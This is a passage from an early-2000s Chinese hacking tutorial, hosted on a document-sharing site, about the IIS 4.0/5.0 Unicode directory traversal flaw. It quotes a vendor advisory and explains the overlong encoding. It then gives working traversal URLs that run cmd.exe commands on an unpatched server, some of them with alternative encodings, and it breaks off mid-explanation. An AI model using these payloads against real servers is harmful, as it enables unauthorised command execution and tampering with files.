欢迎来到天天文库
浏览记录
ID:14386435
大小:44.00 KB
页数:15页
时间:2018-07-28
《unicode编码漏洞全攻略-1》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库。
1、UNICODE编码漏洞全攻略-1UNICODE编码漏洞全攻略-1badboy这并不是什么权威教材,只适合菜鸟了解win9x、NT存在的不安全面,切莫用此方法在国内做尝试,如果你偏要如此,那么由此引起的一切法律后果由你自己负责。本文只允许在网络任意转载,但须保留文章的完整性,如把本文作为经济目的使用,或者未经本人许可进行印刷、光盘杂志、等出版性质的行为,本人将保留侵权控告的权利。2000年10月17日中联绿盟发布了以下的安全公告:微软IIS4.0/5.0扩展UNICODE目录遍历漏洞远程漏洞:是本地漏洞:是发布日期:2000年10月17日更
2、新日期:2000年10月17日受影响的版本:MicrosoftIIS5.0+MicrosoftWindowsNT2000MicrosoftIIS4.0+MicrosoftWindowsNT4.0+MicrosoftBackOffice4.5-MicrosoftWindowsNT4.0+MicrosoftBackOffice4.0-MicrosoftWindowsNT4.0不受影响的版本:漏洞描述:微软IIS4.0和5.0都存在利用扩展UNICODE字符取代"/"和""而能利用"../"目录遍历的漏洞。未经授权的用户可能利用IUSR_ma
3、chinename账号的上下文空间访问任何已知的文件。该账号在默认情况下属于Everyone和Users组的成员,因此任何与Web根目录在同一逻辑驱动器上的能被这些用户组访问的文件都能被删除,修改或执行,就如同一个用户成功登陆所能完成的一样。测试方法:(以下的程序或方法可能具有攻击性,如用于非法用途,后果自负!)http://target.computer/scripts/..%c1%1c../path/solo.txt%c0%af=/%c1%9c=解决方案:该漏洞补丁随微软安全公告MS00-057一起发布(http://www.micr
4、osoft.com/technet/security/bulletin/ms00-057.asp)可以从如下地址下载补丁:IIS4.0http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.aspIIS5.0http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp(以上为原文)该漏洞一发布后,紧接而来的是众多NT网络服务器惨遭黑手,可以说,到目前为止,网络里
5、仍存在此漏洞的NT服务器至少有30%,而这些站点的管理员是白痴还是认为该漏洞不值得注意??看来是不曾被黑不落泪,NT站的管理员们,看完以下的方法,你快点给你的NT服务器打补丁吧。一、UNICODE漏洞的原理此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,台湾繁体中文也同样存在这样的漏洞。中文版的WIN2000中,UNICODE编码存在BUG,在UNICODE编码中%c1%1c-〉(0xc1-0xc0)*0x40+0x1c=0x5c=‘/‘%c0%2f-〉(0xc0-0
6、xc0)*0x40+0x2f=0x2f=‘‘在NT4中/编码为%c1%9c在英文版里:WIN2000英文版%c0%af但从国外某些站点得来的资料显示,还有以下的编码可以实现对该漏洞的检测,具体情况本人未做详细的证实:%c1%pc%c0%9v%c0%qf%c1%8s%e0%80%af%f0%80%80%af%fc%80%80%80%80%af或许是什么日文版、韩文版之类,win2000Terminal版有兴趣的朋友可以试试。二、UNICODE漏洞的检测以下均以中文版WIN2K为例,如果是其他NT版本,按上面所述的编码替换以下代码中的%c1
7、%1c最简单的检测方法:比如说有一IP地址为X.X.X.X的WIN2K主机,我们可以在地址栏输入x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir如果存在此漏洞的话,我们便可以看到以下的内容:(例子假设SCRIPTS目录里无文件)DirectoryofC:inetpubscripts2000-09-2815:49〈DIR〉.2000-09-2815:49〈DIR〉..这是我们在很多经验交谈中常看到大家使用的方法,实际上我们也可以改为这样127.0.0.1/scripts/.
8、.%c1%1c../winnt/system32/cmd.exe?/r+dir即r=c这个字母的取代,在本文发表之前,网络里没有介绍过,关于r这字母可以等效于c,我们可以通过cmd/?可以得到
此文档下载收益归作者所有